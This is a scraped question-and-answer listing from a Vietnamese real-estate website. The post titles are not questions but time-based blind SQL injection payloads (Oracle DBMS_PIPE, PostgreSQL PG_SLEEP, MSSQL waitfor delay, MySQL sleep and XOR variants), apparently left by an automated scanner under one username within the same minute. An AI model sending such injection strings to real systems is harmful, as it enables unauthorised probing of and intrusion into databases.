Danh Viet Group Icon Central Danh Khôi Việt Nhà Phố Para Grus icon plaza

Hỏi đáp

pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Người gửi: pHqghUme | Thời gian gửi: 04/03/2022 20:44 | Khu vực: Hồ Chí Minh

Thị trường nhà đất

Trả lời: 0 | Lần xem: 95

wgZfkAFc')) OR 206=(SELECT 206 FROM PG_SLEEP(15))--

Người gửi: pHqghUme | Thời gian gửi: 04/03/2022 20:44 | Khu vực: Hồ Chí Minh

Thị trường nhà đất

Trả lời: 0 | Lần xem: 139

Bliec0Y9') OR 252=(SELECT 252 FROM PG_SLEEP(15))--

Người gửi: pHqghUme | Thời gian gửi: 04/03/2022 20:44 | Khu vực: Hồ Chí Minh

Thị trường nhà đất

Trả lời: 0 | Lần xem: 137

ANOiQESL' OR 429=(SELECT 429 FROM PG_SLEEP(15))--

Người gửi: pHqghUme | Thời gian gửi: 04/03/2022 20:44 | Khu vực: Hồ Chí Minh

Thị trường nhà đất

Trả lời: 0 | Lần xem: 130

CPo6OH6O'; waitfor delay '0:0:15' --

Người gửi: pHqghUme | Thời gian gửi: 04/03/2022 20:44 | Khu vực: Hồ Chí Minh

Thị trường nhà đất

Trả lời: 0 | Lần xem: 94

1 waitfor delay '0:0:15' --

Người gửi: pHqghUme | Thời gian gửi: 04/03/2022 20:44 | Khu vực: Hồ Chí Minh

Thị trường nhà đất

Trả lời: 0 | Lần xem: 89

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Người gửi: pHqghUme | Thời gian gửi: 04/03/2022 20:44 | Khu vực: Hồ Chí Minh

Thị trường nhà đất

Trả lời: 0 | Lần xem: 83

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Người gửi: pHqghUme | Thời gian gửi: 04/03/2022 20:44 | Khu vực: Hồ Chí Minh

Thị trường nhà đất

Trả lời: 0 | Lần xem: 83

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Người gửi: pHqghUme | Thời gian gửi: 04/03/2022 20:44 | Khu vực: Hồ Chí Minh

Thị trường nhà đất

Trả lời: 0 | Lần xem: 91

if(now()=sysdate(),sleep(15),0)

Người gửi: pHqghUme | Thời gian gửi: 04/03/2022 20:44 | Khu vực: Hồ Chí Minh

Thị trường nhà đất

Trả lời: 0 | Lần xem: 95